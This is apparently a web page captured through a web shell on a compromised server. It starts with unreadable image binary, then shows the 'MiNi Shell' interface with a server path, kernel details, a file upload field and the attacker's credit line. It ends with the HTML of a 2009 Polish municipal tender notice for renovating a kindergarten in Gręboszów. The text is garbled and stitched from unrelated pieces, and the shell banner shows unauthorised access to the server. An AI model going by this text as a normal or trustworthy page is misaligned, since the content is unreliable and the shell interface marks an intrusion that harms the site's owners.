JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090515/150670-N-2009.html

<p class="kh_header"><b>Gręboszów: Remont budynku Przedszkola Publicznego w Gręboszowie</b><br>
<b>Numer ogłoszenia: 150670 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Gręboszów , Gręboszów 144, 33-260 Gręboszów, woj. małopolskie, tel. 014 6416002, faks (014) 641 60 53.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku Przedszkola Publicznego w Gręboszowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  Remont  budynku Przedszkola Publicznego w Gręboszowie. Pow. zabudowy - 221,10 m2, pow. użytkowa - 141,70 m2, pow. użytkowa po zagospodarowaniu poddasza - 182,70 m2, kubatura - 539,60 m3.   Lokalizacja - miejscowość Gręboszów, działka nr 364 obręb Gręboszów. 
Zakres robót budowlano - remontowych obejmuje:
1) przebudowa zadaszenia
2) remont sanitariatów przedszkolnych (dla dzieci) i dla personelu
3) remont pomieszczeń kuchennych wraz z ich zagospodarowaniem ( z wyposażeniem)
4) zagospodarowanie części poddasza, do tej pory nieużywanego 
5) przebudowa ścianek działowych na parterze i poddaszu
6) przebudowa kominów
7) wymiana stolarki drzwiowej wewnętrznej i stolarki okiennej
8) wykonanie elewacji z ociepleniem
9) izolacja ścian zewnętrznych i wewnętrznych
10) remont instalacji wewnętrznych  i zewnętrznych (wody, kanalizacji sanitarnej, centralnego ogrzewania, wentylacji, kanalizacji opadowej, instalacji elektrycznej, odgromowej)
Szczegółowy opis przedmiotu zamówienia znajduje się w dodatkach: nr 8 (przedmiar robót), nr 9 (projekt remontu), nr 10 (specyfikacja techniczna wykonania i odbioru robót) stanowiące załączniki  do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.52.21-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od Wykonawców  wniesienie wadium  przetargowego w kwocie 7 000,00 zł,słownie:  siedem  tysięcy  złotych, które winno być wniesione  przed upływem terminu składania ofert. 2.    Wadium może być wniesione w jednej  lub w kilku  następujących formach:1)	pieniądzu, 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, 3)	gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych, 5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. nr 109, poz. 1158 ze zm.).
3    Wadium wnoszone w formie pieniężnej należy wpłacić  przelewem na rachunek  bankowy Zamawiającego: Konto Nr  33 94621013 2004 4000 1498 0006  Bank Spółdzielczy w Dąbrowie Tarnowskiej Oddział Gręboszów z dopiskiem  Wadium do przetargu na remont przedszkola. 4.    W przypadku wnoszenia wadium w formie pieniężnej do oferty należy załączyć kopię przelewu wadium na  rachunek bankowy Zamawiającego potwierdzoną za zgodność z oryginałem przez Wykonawcę. 
Za termin  wniesienia wadium uznaje się datę wpływu na  rachunek   zamawiającego. Wadium pieniężne musi być  zaksięgowane najpóźniej dzień przed upływem terminu składania ofert, dlatego Wykonawca musi uwzględnić czas, aby wymagana kwota  zdążyła wpłynąć na konto Zamawiającego (została zaksięgowana w banku na rzecz Zamawiającego). 5.   W przypadku wnoszenia przez Wykonawcę wadium w formie określonej w ust.2 pkt 2-5 zobowiązany 
jest on dostarczyć Zamawiającemu oryginał właściwego dokumentu poręczenia lub gwarancji przed upływem  terminu składania ofert i złożyć go w siedzibie Zamawiającego w pokoju nr 11 - sekretariat, a do  oferty  dołączyć kopię przedmiotowego dokumentu potwierdzoną za zgodność z oryginałem przez 
Wykonawcę.  Wymagana ważność wadium w formach innych niż pieniężna  minimum - 60 dni od daty otwarcia ofert. Składane przez Wykonawcę wadium w formie niepieniężnej  musi się powoływać w swej treści na przepis   art. 46 ust. 5 Pzp i być bezwarunkowe, nieodwołalne i płatne na pierwsze pisemne żądanie Zamawiającego. 6.   Wykonawca, który wniesie wadium w innej, niż wyżej wskazanej formie, jego oferta nie będzie zabezpieczona   wadium, a Zamawiający będzie musiał wykluczyć go z postępowania na podstawie art. 24 ust.2 pkt 4 ustawy. 7.    Wadium wniesione w pieniądzu  Zamawiający przechowuje na rachunku bankowym, które zwraca  wraz z odsetkami wynikającymi z umowy rachunku bankowego pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew na rachunek oferenta. 8.   Zamawiający zwróci niezwłocznie wadium na  pisemny wniosek  Wykonawcy: 1)	który wycofał ofertę przed upływem terminu składania ofert, 2)	który został wykluczony z postępowania,
3) którego oferta została odrzucona. 9.    Zamawiający zwraca niezwłocznie  wadium, jeżeli: 1)	upłynął termin związania ofertą, 2)	zawarł umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania umowy,
3) Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin ich wnoszenia. 10.	 Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 11.   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 ustawy,  lub pełnomocnictw, chyba że udowodnił, że wynika to z przyczyn nie leżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  Zgodnie z art. 22 ust.1 Ustawy o udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy: 1)  posiadają uprawnienia do wykonywania określonej działalności będącej przedmiotem zamówienia. 2) posiadają niezbędną wiedzą i doświadczenie oraz dysponują  potencjałem  technicznym i osobami zdolnymi  do  wykonania   zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia oraz wykażą się odpowiednim doświadczeniem t.j.: w ostatnich  5 latach, jeśli okres prowadzenia działalności  jest krótszy - w tym okresie, wykonali co najmniej  2 zamówienia,  i każde odpowiadające swoim rodzajem i minimum 
wartości  robotom budowlanym stanowiącym przedmiot zamówienia oraz, że zostały one wykonane należycie, 3) znajdują  się  w  sytuacji   ekonomicznej i finansowej    zapewniającej   wykonanie   zamówienia oraz  - są ubezpieczeni od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności gospodarczej 
na kwotę nie niższą niż  przedmiot zamówienia,- uzyskali w ostatnim roku obrót na poziomie nie niższym niż 1,5 wartość robót stanowiąca przedmiot zamówienia,
- posiadają środki finansowe lub zdolność kredytową na kwotę nie niższą niż przedmiot zamówienia 4) nie podlegają wykluczeniu z postępowania o zamówienie publiczne  na podstawie  art. 24 ustawy. 2.  W  przypadku gdy o udzielenie zamówienia ubiega się konsorcjum, wymaga się wówczas, aby żaden z jego 
członków nie podlegał wykluczeniu z postępowania na podstawie art. 24  ustawy, a członkowie  łącznie spełniali warunki określone w ust 1  niniejszego rozdziału.
3.  Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału na podstawie złożonych w ofercie   oświadczeń i dokumentów wymienionych w rozdziale VII specyfikacji istotnych warunków zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na  potwierdzenie spełnienia warunków udziału w postępowaniu określonych w rozdziale VI niniejszej specyfikacji Wykonawcy muszą dostarczyć następujące dokumenty i oświadczenia: 1.  a) W celu potwierdzenia, że wykonawca  posiada uprawnienia do wykonania zamówienia, winien złożyć: aktualny odpis  z właściwego rejestru albo aktualne  zaświadczenia o wpisie do ewidencji działalności  gospodarczej,  jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji  działalności gospodarczej, z którego to dokumentu wynika, że oferent prowadzi działalność w zakresie   objętym  niniejszym zamówieniem, wystawionym nie wcześniej niż 6 miesięcy przed  upływem terminu  składania  ofert. W przypadku,  jeżeli działalność  gospodarcza przedsiębiorców jest prowadzona   w formie spółki  cywilnej  należy dołączyć  również  umowę spółki  cywilnej.            b) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1.a) - składa dokument lub dokumenty wystawione w kraju,  w którym ma  siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument powinien być wystawiony nie wcześniej      niż 6 miesięcy  przed upływem składania ofert. c)  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma   siedzibę lub miejsce  zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1.a), zastępuje się je dokumentem 
zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym ma siedzibę lub miejsce zamieszkania. 2. W celu potwierdzenia, że wykonawca  posiada  niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem  technicznym i osobami    zdolnymi  do  wykonania   zamówienia winien  złożyć:
a) wykaz osób, którymi dysponuje lub będzie dysponował i które  będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami  na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania  zamówienia, a także zakresu wykonywanych przez nie czynności.  -wg (wzoru) dodatek nr 3 do  SIWZ.  Osoby, które będą uczestniczyć  w wykonywaniu 
zamówienia, muszą posiadać wymagane   uprawnienia, jeżeli  ustawy nakładają obowiązek  posiadania takich   uprawnień.  Należy załączyć odpis  odpowiednich  uprawnień budowlanych umożliwiających sprawowanie funkcji kierownika budowy, oraz  aktualne zaświadczenie o przynależności jego do samorządu zawodowego wraz z ubezpieczeniem od  odpowiedzialności cywilnej. b)  pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia,       jeżeli w wykazie o którym mowa 2 pkt a) wykonawca wskazał osoby, którymi będzie dysponował, c)  wykaz   podwykonawców, posiadane ich kwalifikacje oraz rodzaj i wartości powierzonej im części zamówienia - wg (wzoru) dodatek nr 4 do  SIWZ. d) wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres  prowadzenia działalności  jest krótszy w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty 
zostały wykonane należycie. -wg (wzoru) dodatek nr 5 do  SIWZ.  Wykonawca winien  wykazać, że wykonał  tym okresie,  co najmniej  2 zamówienia, i każde odpowiadające swoim rodzajem i minimum wartości  robotom  budowlanym stanowiącym  przedmiot zamówienia  oraz, że  zostały one wykonane  
                 należycie (potwierdzone protokołami odbioru, referencjami itp.),
             e) wykaz niezbędnego do  wykonania zamówienia sprzętu technicznego, którym wykonawca dysponuje 
                 lub będzie dysponował -   według (wzoru)  dodatek nr 6 do SIWZ;   
             f)  pisemne zobowiązanie innych podmiotów do  udostępnienia potencjału technicznego, jeżeli w wykazie,
                  o którym mowa w pkt 2e), wykonawca wskazał sprzęt techniczny, którym będzie dysponował.
          3. W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej  
               zapewniającej wykonanie   zamówienia winien złożyć oświadczenie o sytuacji finansowej wykonawcy
               - wg (wzoru) dodatek  nr 7 do SIWZ, dołączając:
               a) sprawozdanie finansowe za ostatni rok,
               b) dokument, z którego wynikać będzie, że Wykonawca  w ostatnim roku osiągnął obrót na poziomie 
                   nie niższym niż  1,5 krotna wartość robót stanowiąca  przedmiot zamówienia,
               c) aktualne ubezpieczenie  od odpowiedzialności cywilnej (OC) w zakresie prowadzonej działalności 
                   gospodarczej na kwotę nie niższą niż przedmiot zamówienia,
               d) informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej w których wykonawca 
                   posiada rachunek, potwierdzająca wysokość posiadanych środków lub zdolność kredytową 
                   Wykonawcy, wystawioną nie wcześniej niż 1 miesiąc przed upływem terminu składania ofert.
                   Z w/w  informacji musi wynikać w sposób jednoznaczny, że Wykonawca  dysponuje środkami 
                   finansowymi w kwocie umożliwiającej wykonanie przedmiotu zamówienia.
           4.  W celu potwierdzenia, że wykonawca nie podlega  wykluczeniu z postępowania o zamówienie 
                publiczne   na podstawie  art. 24 ustawy  winien złożyć oświadczenie wykonawcy  o spełnieniu  warunków 
                 udziału w postępowaniu o udzielenie zamówienia -według (wzoru)  dodatek. Nr 2  do  SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl BIP Małopolska gmina Greboszów.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gręboszów,33-260 Gręboszów 144, pokój nr 2 (parter) lub za pośrednictwem pocztowym, po uprzednim złożeniu wniosku nie później niż 6 dni przed terminem otwarcia ofert. Cena 100 zł +22% VAT..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2009 godzina 09:00, miejsce: Urząd Gminy Gręboszów, 33-260 Gręboszów 144, pokój nr 11 (pietro) - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com